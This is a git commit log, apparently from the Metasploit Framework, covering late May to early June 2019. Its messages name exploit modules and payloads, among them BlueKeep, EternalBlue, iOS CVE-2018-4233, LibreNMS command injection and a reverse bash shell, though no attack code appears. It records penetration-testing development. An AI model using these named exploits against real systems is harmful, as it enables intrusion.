Tom Sellers b176948c3c Refactor more binary blobs 2019-06-03 16:54:33 -05:00
Adam Cammack deb31d77c3 Use the aliased name on instantiated modules
This creates a way for modules and the framework to see what name the
user entered to interact with a module.
2019-06-03 13:55:02 -05:00
Adam Cammack 2e36d90291 Add some less-verbose aliases
These aliases avoid duplicating the protocol in the module name.
2019-06-03 13:42:55 -05:00
Adam Cammack cf59022936 Add aliases to modules
This allows modules that can be addressed by name to register possible
aliases for themselves by defining an `Aliases` constant in the top
level of the module.
2019-06-03 13:40:27 -05:00
Adam Cammack c0d365aa46 Unify modules and cache with fullname method 2019-06-03 13:19:29 -05:00
Tom Sellers 61b5072e88 Add explicit check for NLA 2019-06-03 09:38:12 -05:00
Jacob Robles d466ac990d Use process_opts_workspace 2019-06-03 09:25:31 -05:00
Tom Sellers 5871dc0802 Fix nego when RDP Security is forced 2019-06-03 08:50:30 -05:00
bwatters-r7 e425547398 Add some files to the test that are not likely to be open 2019-06-03 08:25:46 -05:00
William Vu e11cc621ea Add ensures 2019-06-03 03:51:08 -05:00
suzu991154 cdce03f42d fix_os_check 2019-06-03 16:17:23 +09:00
sinn3r 22e8d3488d Land #11862, wordlists for wordpress plugin/theme directories
Add wordlists for enumerating WordPress plugin/theme directories
2019-06-03 00:54:43 -05:00
William Vu 7c83734592 Update LoginScanner::SSH modules 2019-06-02 20:08:27 -05:00
William Vu ad2ece1489 Actually set the client identification string 2019-06-02 20:01:04 -05:00
William Vu 2318100a12 Rename SSHVersion to SSH_IDENT for now
1. Not to be confused with protocol version
2. We'll want to CamelCase the advanced options
2019-06-02 18:26:25 -05:00
William Vu 586fe73699 Add Msf::Exploit::Remote::SSH::Options 2019-06-02 18:21:58 -05:00
William Vu f70eac785d Update comment 2019-06-02 17:04:31 -05:00
William Vu 3107339c6b Add prints 2019-06-02 17:02:07 -05:00
William Vu 776061cc28 Fix style again 2019-06-02 16:55:48 -05:00
William Vu 75f1f0e331 Revert method name 2019-06-02 16:54:03 -05:00
William Vu 44ac458407 Simplify error check 2019-06-02 16:53:02 -05:00
William Vu 1fc49b2e12 Fix style 2019-06-02 16:50:44 -05:00
William Vu eaa718f33a Add functionality to change Net::SSH ident string 2019-06-02 16:46:43 -05:00
Tim W cd460aa2cb fix cmd_exec tests on python/windows 2019-06-03 03:47:52 +08:00
Brent Cook 76aeeafe7b Land #11936, rename a few module docs 2019-06-02 13:54:03 -05:00
Brent Cook ba947eab20 another rename 2019-06-02 13:53:44 -05:00
Brent Cook 3cf375c05c if there is no content, don't include content length 2019-06-02 13:27:11 -05:00
Chris Higgins 6ffc6b9b18 Fix #11934, frontpage_credential_dump.md file move 2019-06-02 12:40:18 -05:00
Metasploit f70a56edcf automatic module_metadata_base.json update 2019-06-02 09:56:15 -07:00
Tim W b5bdc06c4c Land #11933, add default VID and cmd/unix support to post/multi/manage/play_youtube 2019-06-03 00:39:11 +08:00
William Vu 42082f0bcf Add unix platform 2019-06-02 11:31:43 -05:00
William Vu fe5bc8242f Add cmd/unix support 2019-06-02 11:19:44 -05:00
William Vu 852cd6c6c6 Note unused variables 2019-06-02 11:19:30 -05:00
William Vu 290741719c Add default VID to post/multi/manage/play_youtube 2019-06-02 11:01:57 -05:00
Brent Cook d3354152ab Land #11913, remove older Ruby's from test matrix 2019-06-02 10:48:27 -05:00
Tom Sellers 23139c5000 Bluekeep: add TLS, refactor 2019-06-02 10:02:09 -05:00
CCob aaa017e9cd Fix issue where Linux x64 shell_find_port did not set the sockaddr_len value 2019-06-02 09:23:09 +01:00
Metasploit 3ddd68394b automatic module_metadata_base.json update 2019-06-01 19:46:11 -07:00
Brent Cook 817d3ce081 Land #11477, add Exploit for CVE-2018-4233 and async_wait for iOS 10 to 11.2 2019-06-01 21:24:44 -05:00
Tim W 18c825d7fa update mettle payloads gem to include dylib 2019-06-02 10:22:30 +08:00
Tim W 6921ca74d8 add exploit binary 2019-06-02 10:19:24 +08:00
Tim W d0cce0a6a4 offsets for iPhone 5S 10.2.1 2019-06-02 10:19:24 +08:00
Tim W d2c43ea30b add documentation 2019-06-02 10:19:24 +08:00
Tim W 5b708532b4 use MetasploitPayloads to_binary 2019-06-02 10:19:24 +08:00
Tim W c659a1e5b4 add description 2019-06-02 10:19:24 +08:00
Tim W 448782a927 fix build when missing IOKit headers 2019-06-02 10:19:24 +08:00
Tim W aabe316662 fixes for iOS 10 2019-06-02 10:19:24 +08:00
Tim W 2b54d411f6 fix iOS 11 offset cache 2019-06-02 10:19:24 +08:00
Tim W e6a8d66460 fix iOS 10 again 2019-06-02 10:19:24 +08:00
Tim W b7574f2dd8 cleanup 2019-06-02 10:19:24 +08:00
Tim W 90da47627b fix file-map-executable 2019-06-02 10:19:24 +08:00
Tim W d2eec0fef2 trustcache 2019-06-02 10:19:24 +08:00
Tim W 7156b1b31f uid0 2019-06-02 10:19:24 +08:00
Tim W 70aa762958 tfp0 via async_wake 2019-06-02 10:19:24 +08:00
Tim W 6d9385cb8a ios 11 faf 2019-06-02 10:19:24 +08:00
Tim W b142115c82 fix iOS 11.0.2 2019-06-02 10:19:24 +08:00
Tim W 6f6cf443b6 begin iOS 11 2019-06-02 10:19:24 +08:00
Tim W 33a4866c36 add offset cache 2019-06-02 10:19:24 +08:00
Tim W dd8b3d2b94 fix 10_3_2 2019-06-02 10:19:24 +08:00
Tim W f15e70ea03 various fixes 2019-06-02 10:19:24 +08:00
Tim W f7ee0234b6 fix liboffsetfinder64 2019-06-02 10:19:24 +08:00
Tim W f1392e1828 compile liboffsetfinder64 2019-06-02 10:19:24 +08:00
Tim W 9d0ab73b33 fix build 2019-06-02 10:19:24 +08:00
Tim W 3d414dac74 add hash to trust cache 2019-06-02 10:19:24 +08:00
Tim W 32af9cb897 Initial commit of CVE-2018-4233 for iOS 10 2019-06-02 10:19:24 +08:00
Metasploit 28d671ca03 automatic module_metadata_base.json update 2019-06-01 10:33:05 -07:00
Brent Cook 1de4a83d13 Land #11902, add missing cmd/unix/reverse_bash_udp test 2019-06-01 12:09:56 -05:00
Brent Cook 4286068154 Land #11906, fix osx 10.7 hash IDing and JTR IDs 2019-06-01 12:05:35 -05:00
Tim W 103afc6568 fix screenshare 2019-06-02 00:16:13 +08:00
suzu991154 0a6f1d5538 Add support for Windows 10(10240) to CVE-2015-5122 2019-06-01 14:44:30 +09:00
Brent Cook 53557cc92e replace trivial usage of expand_path with getenv
expand_path is not implemented consistently across platforms and
sessions, which leads to confusing behavior. In places where we have trivial
single variable expansions, this changes modules and library code to just use
getenv.

We'll look at the rest individually to see if they can also be reimplemented in
terms of getenv.
2019-05-31 17:44:35 -05:00
Brent Cook 3cff008d73 Land #11915, raise exceptions directly 2019-05-31 15:18:02 -05:00
Brent Cook 621d404a27 fix tests, handle stdin properly 2019-05-31 15:02:59 -05:00
Jacob Robles 7c29c56880 Bubble error
Raise Validation error that is checked for
2019-05-31 14:57:33 -05:00
William Vu cb39f72808 Land #11911, Java payload fixes 2019-05-31 14:56:41 -05:00
Brent Cook d988fe6e5c handle invalid payloads more clearly
Currently, if you have an error in a payload module (e.g. you have a syntax
error in a module), the error is not noticed early enough in the generation process by the parameter validator, leading to a mysterious message like so:

```
Error: undefined method `platform' for nil:NilClass
```

This change cleans up some of the error handling, checks to see if the payload
module can be instantiated, and gives a more useful error output for the
different cases. This also tweaks some of the literal string outputs to match
other exception strings from payload_generator.
2019-05-31 14:32:49 -05:00
Brent Cook 93d1b955c5 also kill 2.4.x 2019-05-31 14:09:36 -05:00
Chris Higgins 01de6954fe Land #11912, Bigdecimal boot 2019-05-31 14:04:20 -05:00
Jeffrey Martin bd67ecd0dc add missing cmd/unix/reverse_bash_udp test 2019-05-31 13:53:12 -05:00
Jacob Robles e9d0dc7518 Workspace arg used in call to func 2019-05-31 13:17:59 -05:00
Jacob Robles 37b0809e05 Remove workspace call
The #workspace call wasn't running as expected when using
the data service. It was ending up in infinite recursion.
2019-05-31 13:08:27 -05:00
Brent Cook 068f8f98f7 remove Ruby 2.3.8 from Metasploit test matrix
Ruby 2.3.8 is no longer supported:
https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-3-8-released/
2019-05-31 12:57:38 -05:00
Brent Cook 73c8e803fe Land #11892, Fix parse IPv6 address in reverse_http 2019-05-31 12:41:36 -05:00
Brent Cook d9d0639a91 move BigDecimal patch earlier in boot process
This makes msfvenom also quiet about the impending deprecation.
2019-05-31 12:31:35 -05:00
Brent Cook 526df180b1 fix java/android cmd_exec and shell_command_token
This change fixes a race condition in the cmd_exec tests and rapid7/metasploit-framework#11530

From https://github.com/rapid7/metasploit-payloads/pull/334
2019-05-31 11:11:01 -05:00
Metasploit 8295aebf3a automatic module_metadata_base.json update 2019-05-31 07:54:05 -07:00
Brent Cook 23e59c9e66 Land #11838, add keyboard and mouse input controls on Windows/MacOS 2019-05-31 09:35:01 -05:00
Brent Cook b9af69a5be update payloads 2019-05-31 09:32:44 -05:00
Brent Cook edefc52bbd Merge branch 'master' into land-11838- 2019-05-31 09:29:25 -05:00
Jeffrey Martin b14a40f564 Land #11887, Fix multi meterpreter_reverse_http handler to not care so much about the workspace. 2019-05-30 18:32:57 -05:00
h00die 06256cc05b fix osx 10.7 hash IDing, and JTR ids 2019-05-30 18:33:45 -04:00
Jake Blank 933cf25efb add live remote screensharing/monitoring 2019-05-31 05:26:38 +08:00
Shelby Pace c2786eb87c made suggested changes 2019-05-30 14:09:40 -05:00
Jacob Robles 1069c3de4f File cleanup 2019-05-30 13:36:28 -05:00
Metasploit 026b38eb71 Bump version of framework to 5.0.27 2019-05-30 10:06:32 -07:00
Shelby Pace 74812ffe4d Update modules/exploits/linux/http/librenms_addhost_cmd_inject.rb
Co-Authored-By: @shellfail <jrobles@rapid7.com>
2019-05-30 10:52:34 -05:00
Shelby Pace 8c11a1c95a Update modules/exploits/linux/http/librenms_addhost_cmd_inject.rb
Co-Authored-By: @shellfail <jrobles@rapid7.com>
2019-05-30 10:51:57 -05:00
Metasploit eaaaab98f7 Bump version of framework to 5.0.26 2019-05-30 06:38:42 -07:00
Jacob Robles 4f6d55b773 Update documentation 2019-05-30 06:30:38 -05:00
Metasploit 4b3feb6280 automatic module_metadata_base.json update 2019-05-29 22:25:02 -07:00
William Vu 622e67d20a Land #11900, normalize_uri style fix 2019-05-30 00:16:16 -05:00
William Vu a0c6035380 Prefer initial slash in normalize_uri
I missed the indirect call in check. This decides on a style.

If a URI part contains a slash, we begin with a slash.
2019-05-30 00:08:17 -05:00
Metasploit 472103d16b automatic module_metadata_base.json update 2019-05-29 22:00:48 -07:00
Brent Cook 810d5e356f Land #11865, expand utility for allegro_rompager_auth_bypass 2019-05-29 23:40:37 -05:00
Brent Cook dee824434f Land #11898, only require pdf-reader if used 2019-05-29 23:35:17 -05:00
Jeffrey Martin 1833c97c8c more require for pdf-reader
In ruby 2,5+ on windows the ttfunk dependency loading causes ruby to crash so
only load this only when specifically required.
2019-05-29 22:36:50 -05:00
Shelby Pace 590b9748c1 changed file name and documentation 2019-05-29 18:30:39 -05:00
Shelby Pace 6606e1fed4 Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
2019-05-29 18:00:59 -05:00
Shelby Pace 5253d34dd3 Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
2019-05-29 18:00:07 -05:00
Shelby Pace 34528b1512 Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
2019-05-29 17:59:55 -05:00
Shelby Pace bd0109b328 add documentation 2019-05-29 15:51:53 -05:00
Shelby Pace fa1ce20e74 add note 2019-05-29 15:50:31 -05:00
Shelby Pace de081a08cd add working exploit 2019-05-29 15:09:23 -05:00
Metasploit ec168accb1 automatic module_metadata_base.json update 2019-05-29 11:11:02 -07:00
Jacob Robles 87e9fddd2f CMD Target Update
Generic payload auto-disables the handler so we don't have
to handle that now. Also, remove datastore modifications
in the module.
2019-05-29 13:09:21 -05:00
Jacob Robles 61b500d148 Land #11894, Note deprecated DIAL protocol in chromecast_youtube 2019-05-29 12:51:43 -05:00
William Vu 6580f14c3a Once more, with feeling 2019-05-29 12:19:52 -05:00
William Vu 78fca9f91a Suggest CASTV2 is unsupported 2019-05-29 11:50:53 -05:00
n̸̺̳̮̖͚̺̺͍̪̰͎̰͇̯̙̋ͣͣ̆̇ͥ̕n̷̑͐̑ͩ̾͗ͣ͐̏҉̣̞̖͖͕̗̞̳̯͚̖n̶̵̫̣͓͈͓̥̣̬̠̗̤͔͖̘̫̪̱͇̤̏ͯ̿ͫͥ͐̍͂͛͊̓͜͢n̨̡̙̼̗̳̿̂ͤ̑͆ͧ́͂̈n̷̸̛͙̘̙̪͔͕͖̻̹͇̮̰̖̣͓̖̫ͪͥ̓̑͒͟͠ņͤͤͯ̌̒̽́̎ͦ̃̈͆̿͒̊ͣ͏̡͎̪̗̻̱̭̲̤͈̞̦͇͍̤̪̥̳̙͘ͅn̨͇̦̭̞̹̗̞̖̪̤̗ͩ́̋͛͂̂̿ͭͭ̈͢ʌ̸̵͉̱͍̤͍̫̰̘͚̲̝̩̤̙͗̑ͥ̃̈́͌̔̿̉͒ͦ̿̈̋́̚̚̕͢ͅʍ̸̭̰̬̖͚͓̠̮͙͓̝̥̞̥͉̏̈ͩͥͣͣ̆ d3c92488ea Update documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md
Co-Authored-By: @shellfail <jrobles@rapid7.com>
2019-05-29 11:47:56 -05:00
William Vu 9ba1ac075a Add word 2019-05-29 11:46:45 -05:00
William Vu ba0ce74a35 Don't downcase anymore 2019-05-29 11:45:52 -05:00
William Vu 688b7ed7ab Update module doc 2019-05-29 11:44:11 -05:00
William Vu 6aac15b539 Add note about CASTV2 protocol 2019-05-29 11:39:19 -05:00
William Vu 472f2c0d0b Deprecate DIAL protocol in chromecast_youtube 2019-05-29 11:31:14 -05:00
Shelby Pace 6279136359 adding and deleting devices 2019-05-28 15:12:35 -05:00
Metasploit eb1592724a automatic module_metadata_base.json update 2019-05-28 09:47:37 -07:00
Jacob Robles ff6350183e Land #11882, oracle_login verbose message 2019-05-28 11:35:08 -05:00
Metasploit 2e1284f1c8 automatic module_metadata_base.json update 2019-05-28 09:28:33 -07:00
bwatters-r7 efaacbeb2a Land #11797, Added to code to remove payload once run.
Merge branch 'land-11797' into upstream-master
2019-05-28 11:12:00 -05:00
NoodleOfDeath 2a5233156f Updated wordlists to match generated script provided on https://github.com/rapid7/metasploit-framework/pull/11862 2019-05-28 12:02:03 -04:00
ssyy201506 ecda8d864a Fix incorrect parsing of IPv6 uri. 2019-05-28 16:41:34 +09:00
h00die 01d80cef53 land #11888 doc update 2019-05-27 14:06:00 -04:00
Syed Umar Arfeen b92e5a1a6f Update autoroute.md
Mistakenly, the variable LPORT was used rather than SRVPORT. In case the user changes the port using LPORT, the proxychains won't work.
2019-05-27 12:01:44 +05:00
Matt Robinson 26eebb9620 Fix multi handler reverse_http to not care so much about the workspace. 2019-05-25 16:25:06 -04:00
Metasploit ce6db9c648 automatic module_metadata_base.json update 2019-05-25 12:11:05 -07:00
William Vu 73fe72e8d6 Land #11885, linux/armle/shell_bind_tcp ARGV0 fix 2019-05-25 13:54:27 -05:00
苇子 8af7ed9526 Update shell_bind_tcp.rb
fix a mistake in payloads/singles/linux/armle/shell_bind_tcp.rb
2019-05-25 17:51:30 +08:00
Metasploit 1242fe7b7b automatic module_metadata_base.json update 2019-05-24 16:53:58 -07:00
Brent Cook 4122c77c0c Land #11884, Fix rdp_scanner and update CVE-2019-0708 docs 2019-05-24 18:35:43 -05:00
William Vu 68a55cd9a9 Update CVE-2019-0708 module doc 2019-05-24 17:35:31 -05:00
William Vu 54eb73f8b8 Address @egypt's rdp_scanner review 2019-05-24 17:31:22 -05:00
Clément Notin 0c38780692 fix msftidy 2019-05-24 23:56:27 +02:00
NoodleOfDeath 7bd9608d5e Removed extraneous newline ending in wp-plugins.txt 2019-05-24 17:50:33 -04:00
Metasploit 0701ee1dbd Bump version of framework to 5.0.25 2019-05-24 14:45:04 -07:00
NoodleOfDeath d4e79cffe7 added wp-themes wordlist to reflect https://themes.svn.wordpress.org/ 2019-05-24 17:40:37 -04:00
NoodleOfDeath 9f3e4e0b65 modified wordlist to reflect https://plugins.svn.wordpress.org/ 2019-05-24 17:37:02 -04:00
asoto-r7 2abd90bcdf Land #11883, CVE-2019-0708 docs change to .md extension 2019-05-24 16:37:01 -05:00
Shelby Pace e16d144723 added base of module 2019-05-24 16:20:44 -05:00
Metasploit d897472414 automatic module_metadata_base.json update 2019-05-24 14:12:48 -07:00
Carter Brainerd 6d3307a25a .rb -> .md 2019-05-24 17:08:37 -04:00
asoto-r7 11b3feeaff Land #11869, auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-24 16:01:45 -05:00
asoto-r7 fa70461374 Add documentation 2019-05-24 16:01:07 -05:00
Clément Notin fe0cb19333 oracle_login: add verbose print error when login fails 2019-05-24 20:02:01 +02:00
zerosum0x0 82debcbada remove useless debug print 2019-05-24 11:23:25 -06:00
zerosum0x0 d0e2a36cdd Merge pull request #4 from wvu-r7/pr/11869
Add metadata and style fixes
2019-05-24 10:51:48 -06:00
Metasploit a25bcbacfd automatic module_metadata_base.json update 2019-05-24 09:45:45 -07:00
William Vu e3be9d2871 Restore syntactic sugar 2019-05-24 11:41:19 -05:00
Jacob Robles 55dcdace03 Land #11846, OATS Console War Deployment 2019-05-24 11:27:36 -05:00
William Vu d158cd131c Add metadata and style fixes 2019-05-24 11:25:58 -05:00
Wei Chen 318dc0ec1f Land #11811, add new target in doc for bpf_sign_extension_priv_esc 2019-05-24 10:49:25 -05:00
Wei Chen fcd360891f Check #attributes for nil, and make sure target is oats console 2019-05-24 10:06:47 -05:00
Metasploit a88c3a2366 automatic module_metadata_base.json update 2019-05-24 05:00:04 -07:00
Jacob Robles 527658dfbc Land #11822, Add CVE-2019-2557 OATS Directory Traversal 2019-05-24 06:40:25 -05:00
Metasploit 50d06fd2cf automatic module_metadata_base.json update 2019-05-24 00:30:24 -07:00
William Vu 9d0cf0661c Land #11857, cmd/unix/reverse_bash_udp payload 2019-05-24 02:19:44 -05:00
bcoles 2d6847ab5e Add alternative cmd payload 2019-05-24 16:33:44 +10:00
William Vu eb006fd2b3 Send to the socket to initiate the session 2019-05-24 00:01:06 -05:00
Metasploit 2d03e0c8f5 automatic module_metadata_base.json update 2019-05-23 16:36:02 -07:00
William Vu 380c639ef3 Land #11794, postgres_payload Postgres 8.2+ update 2019-05-23 18:23:58 -05:00
William Vu 4d2425c624 Land #11880, zero-index show command table 2019-05-23 18:08:55 -05:00
William Vu 019b177e31 Update show command to zero-index 2019-05-23 18:02:22 -05:00
Jeffrey Martin ec02907f8d Land #11879, Add multi-host tab completion to analyze command and fix range truncation bug 2019-05-23 16:01:42 -05:00
William Vu bea3659475 Fix truncated range 2019-05-23 15:41:38 -05:00
William Vu bd31999f1a Limit tab completion in a smarter way 2019-05-23 15:19:36 -05:00
Metasploit 094679317d automatic module_metadata_base.json update 2019-05-23 13:14:43 -07:00
Jeffrey Martin 9c7049c690 Land #11878, Add tab completion and MS17-010 support to analyze command 2019-05-23 14:58:25 -05:00
zerosum0x0 8067893d16 added FIXME for other info leaks 2019-05-23 13:57:49 -06:00
William Vu 9df782c9d9 Limit tab completion 2019-05-23 14:55:39 -05:00
zerosum0x0 e91301f2b7 remove user0 from cookie 2019-05-23 13:49:23 -06:00
William Vu 3f6530481d Add service to MS17-010 scanner 2019-05-23 14:37:12 -05:00
William Vu 2b7a77a0f4 Add tab completion to analyze command 2019-05-23 14:36:54 -05:00
William Vu e9aba85c9d Land #11877, analyze command nil fix 2019-05-23 14:30:15 -05:00
Metasploit 77356c9051 automatic module_metadata_base.json update 2019-05-23 12:16:08 -07:00
Brent Cook 0559fda9db Land #11873, allow calling methods across related modules 2019-05-23 13:56:27 -05:00
zerosum0x0 b511ff05fa change exception to an existing type 2019-05-23 12:42:40 -06:00
zerosum0x0 92cef57f04 remove hex_to_bin 2019-05-23 12:39:21 -06:00
Jacob Robles c36a72875c Fix end line 2019-05-23 12:35:45 -05:00
zerosum0x0 743abddeda Merge pull request #3 from jagotu/bluekeep
Bluekeep: RSA check
2019-05-23 11:09:09 -06:00
Metasploit c2e8b8962a Bump version of framework to 5.0.24 2019-05-23 10:06:40 -07:00
Jeffrey Martin d1895b3db9 restore analyze on framework object 2019-05-23 11:49:43 -05:00
Brent Cook 7d1762314e Land #11871, fix UUID tracking on payloads with latest MDM 2019-05-23 11:35:58 -05:00
Brent Cook bc5aa2ea3d Merge remote-tracking branch 'upstream/master' into land-11871 2019-05-23 11:35:20 -05:00
William Vu c9813cf379 Fix comments 2019-05-23 10:39:11 -05:00
Metasploit a6430e299c automatic module_metadata_base.json update 2019-05-23 06:17:09 -07:00
Jacob Robles 1fe981b8e2 Land #11843, Update MSB references 2019-05-23 08:07:46 -05:00
Metasploit 828d45877c automatic module_metadata_base.json update 2019-05-23 06:05:21 -07:00
bwatters-r7 1371c360e2 Land #11863, Bump mettle 0.5.13
Merge branch 'land-11863' into upstream-master
2019-05-23 07:56:10 -05:00
Jacob Robles db353a7ba1 Fix MS reference number 2019-05-23 07:03:23 -05:00
Jacob Robles a0e90c0848 Remove references to doc.microsoft.com bulletin
MSB references point to this location
2019-05-23 07:01:21 -05:00
Jacob Robles 5d2cd40010 Update MSB reference
Previous MSB references were redirecting to docs.microsoft.com
2019-05-23 07:00:23 -05:00
Metasploit 5170c2f54b automatic module_metadata_base.json update 2019-05-23 04:57:20 -07:00
Jacob Robles 0a2371a4b8 Land #11864, Add RCE vector to Jenkins ACL bypass 2019-05-23 06:09:56 -05:00
Jan Gocník e62cb4cc44 Bluekeep: RSA check 2019-05-23 10:57:22 +02:00
zerosum0x0 3ec0d7966f msftidy yelled at me 2019-05-23 00:05:02 -06:00
zerosum0x0 6745c70878 return status 2019-05-22 23:36:36 -06:00
zerosum0x0 2863120c9f change exception nesting and check messages 2019-05-22 22:58:25 -06:00
William Vu 7eb279e079 Use human_name in reverse_udp handler 2019-05-22 20:25:37 -05:00
Metasploit 71ba20b6b6 automatic module_metadata_base.json update 2019-05-22 18:08:22 -07:00
William Vu e836bdceca Force check only in ETERNALBLUE 2019-05-22 20:07:56 -05:00
William Vu 6007ae60a0 Fix #11860, my fingers don't work 2019-05-22 19:59:19 -05:00
William Vu b5622b160e Fix typo 2019-05-22 19:59:08 -05:00
William Vu 49c91c5171 Land #11860, pipe_auditor backslash normalization 2019-05-22 19:50:56 -05:00
William Vu 0febc730fa Clarify comment 2019-05-22 19:49:24 -05:00
William Vu 3e84f57544 Clarify comment 2019-05-22 18:34:02 -05:00
William Vu 5064f2ce01 Add ForceExploit 2019-05-22 17:50:31 -05:00
William Vu 690b15afc5 Check CheckCode 2019-05-22 17:40:39 -05:00
William Vu 78fb72fea3 Update ms17_010_psexec 2019-05-22 17:31:24 -05:00
William Vu c7ba2ade65 Convert to mixin 2019-05-22 17:27:11 -05:00
William Vu d0a2d9533f Use CheckCode 2019-05-22 16:51:33 -05:00
William Vu db299b71ce Add datastore option 2019-05-22 16:45:01 -05:00
William Vu fdec7613c0 Update comment 2019-05-22 16:30:10 -05:00
William Vu df425d33b5 Update constant name 2019-05-22 16:29:27 -05:00
William Vu 3a8baf0dec Add comment 2019-05-22 16:28:04 -05:00
William Vu ac8b1fdb7e Add some more error checking 2019-05-22 16:26:27 -05:00
William Vu b99de521c4 Add more comments 2019-05-22 16:14:02 -05:00
William Vu a994f728dd Update comment 2019-05-22 16:10:32 -05:00
William Vu 51fc705cb3 Add ForceExploit 2019-05-22 16:06:04 -05:00
William Vu 486caa7e69 Add some error checking 2019-05-22 15:58:26 -05:00
zerosum0x0 1a2367ae46 fixed pkt= 2019-05-22 14:55:34 -06:00
zerosum0x0 ec8509d9b1 remove renamed file 2019-05-22 14:52:11 -06:00
zerosum0x0 34b350ba48 added MS docs to packets and module info 2019-05-22 14:50:39 -06:00
zerosum0x0 a807ee4171 changing file name 2019-05-22 14:49:20 -06:00
William Vu 0f0faee680 Add check method to ms17_010_eternalblue 2019-05-22 15:42:57 -05:00
Wei Chen 388a391b9a Update oats_weblogic_console and its doc 2019-05-22 15:14:17 -05:00
William Vu 801af31d6f Update documentation 2019-05-22 15:03:44 -05:00
William Vu 0b4cc5b547 Update go_go_gadget2 2019-05-22 15:03:44 -05:00
William Vu 6d004862e4 Update go_go_gadget1 2019-05-22 15:03:44 -05:00
William Vu be89a4d9c5 Update exploit method 2019-05-22 15:03:05 -05:00
William Vu f70b3d13a0 Update metadata 2019-05-22 15:03:05 -05:00
Metasploit 1b202658de automatic module_metadata_base.json update 2019-05-22 12:40:18 -07:00
Wei Chen 7660b3cf7e Update oats_downloadservlet_traversal 2019-05-22 14:36:20 -05:00
William Vu f14ab6e2db Land #11868, iis_webdav_upload_asp disclosure date 2019-05-22 14:28:29 -05:00
William Vu 73aabd1adc Land #11861, WebLogic AsyncResponseService updates 2019-05-22 14:23:45 -05:00
Wei Chen ff0ad88598 Update weblogic_deserialize_asyncresponseservice.md for options 2019-05-22 14:19:30 -05:00
Wei Chen 9b9178a59a Update weblogic_deserialize_asyncresponseservice.md for outputs 2019-05-22 14:16:32 -05:00
Metasploit 2ddceb9cbe automatic module_metadata_base.json update 2019-05-22 11:58:13 -07:00
asoto-r7 fbd6040214 Lock metasploit_data_models at 3.0.10 to prevent future surprises 2019-05-22 13:32:40 -05:00
asoto-r7 865f214a85 Remove workspace dependency for creating and locating payloads 2019-05-22 13:32:00 -05:00
William Vu 7e4dc218e6 Remove extraneous backslash 2019-05-22 13:00:09 -05:00
zerosum0x0 4b786e2d9a module for XP/7 2019-05-22 11:30:43 -06:00
William Vu 4fab17358f Land #11847, jenkins_gather fixes 2019-05-22 11:44:42 -05:00
Tod Beardsley 5523dce897 Fix disclosure date for WebDAV module 2019-05-22 09:05:56 -04:00
Jeffrey Martin 310ee3b46b add advanced force to rompager 2019-05-21 15:52:32 -05:00
William Vu 3ffd6363f3 Add comment 2019-05-21 14:34:27 -05:00
bwatters-r7 aafc4483ea Bundle Fumble.... 2019-05-21 14:04:47 -05:00
bwatters-r7 068ba6e3f2 Update Payload cache sizes 2019-05-21 12:40:27 -05:00
bwatters-r7 a784866d70 Update Gemfile.lock 2019-05-21 12:36:57 -05:00
bwatters-r7 840552ee62 Update gemspec file to use the latest mettle v0.5.13 2019-05-21 12:12:15 -05:00
Metasploit c98d1ee48e automatic module_metadata_base.json update 2019-05-21 05:30:53 -07:00
Jacob Robles 6775685c08 Land #11661, Onion Omega2 login scanner 2019-05-21 06:59:44 -05:00
William Vu bb5ce078f3 Fix style 2019-05-21 01:23:26 -05:00
rwincey 99f3f6cb78 Added x64 arch and fixed exe gen 2019-05-20 23:45:26 -04:00
Metasploit 14fb26a528 automatic module_metadata_base.json update 2019-05-20 12:26:12 -07:00
Shelby Pace 0d6008862b Land #11805, add bsd targets to sshexec 2019-05-20 14:16:10 -05:00
Thom Morgan 7325ea669f Update pipe_auditor.rb 2019-05-20 14:35:32 -04:00
Shelby Pace 6633bfc28e Land #11808, add FreeBSD rtld privesc 2019-05-20 13:30:12 -05:00
NoodleOfDeath 5f889919b4 Added a wordlist of 1491 WordPress plugins that can be enumerated in the wp/wp-content/plugins directory 2019-05-20 14:30:02 -04:00
Metasploit 3019623369 automatic module_metadata_base.json update 2019-05-20 11:21:12 -07:00
Wei Chen 7986706f83 Update markdown description for the right CVE 2019-05-20 13:14:56 -05:00
Wei Chen 6847fcc199 Update CVE reference and datastore options for WebLogic exploit 2019-05-20 13:10:06 -05:00
bwatters-r7 966582a10c Land #11833, moodle_cmd_exec nil check
Merge branch 'land-11833' into upstream-master
2019-05-20 13:08:11 -05:00
Brendan Coles b76507f1f3 Add FreeBSD rtld execl() Privilege Escalation module 2019-05-20 13:03:20 -05:00
Thom Morgan 4d9ae525c2 Update lib/msf/core/exploit/smb/client/pipe_auditor.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
2019-05-20 13:58:22 -04:00
Wei Chen cb1333de45 Land #11818, Add CVE-2019-8565 OSX Feedback Assistant local root exploit 2019-05-20 12:51:42 -05:00
Wei Chen 701e52b51b Add some kind of documentation for feedback_assistant_root 2019-05-20 12:49:24 -05:00
NoodleOfDeath f656638f94 smb client now preprends named pipes with missing backslash during check named pipes enumeration 2019-05-20 13:47:18 -04:00
Wei Chen efa00cd2d0 Update module description 2019-05-20 12:43:54 -05:00
William Vu 581b20794c Land #11859, struts2_rest_xstream style fix 2019-05-20 12:39:48 -05:00
Wei Chen 40bc0770f3 Update title 2019-05-20 12:37:46 -05:00
Wei Chen eaaf1dd6c0 Update session types and platform metadata 2019-05-20 12:36:43 -05:00
William Vu 0328814241 Indent ternary statement in struts2_rest_xstream 2019-05-20 12:35:52 -05:00
bwatters-r7 e1f898fe52 Land #11834, Fix ams_hndlrsvc
Merge branch 'land-11834' into upstream-master
2019-05-20 12:29:45 -05:00
Wei Chen 6cd943e0ce Sometimes attributes could be nil if hitting an unexpected page 2019-05-20 10:48:29 -05:00
Brendan Coles 652fc1340e Add cmd/unix/reverse_bash_udp payload 2019-05-20 07:57:01 +00:00
Wei Chen 5a46fdf535 Find frsc value from hidden input instead of using rkelly (js) 2019-05-18 19:25:44 -05:00
Wei Chen 592b8302ab Make sure to calls super for setup, also update doc for output 2019-05-18 18:08:25 -05:00
Wei Chen c2567f2ee3 Fix bug on cleanup ready status & more verbose 2019-05-18 17:50:29 -05:00
Metasploit 4d26f9fe47 automatic module_metadata_base.json update 2019-05-17 16:32:16 -07:00
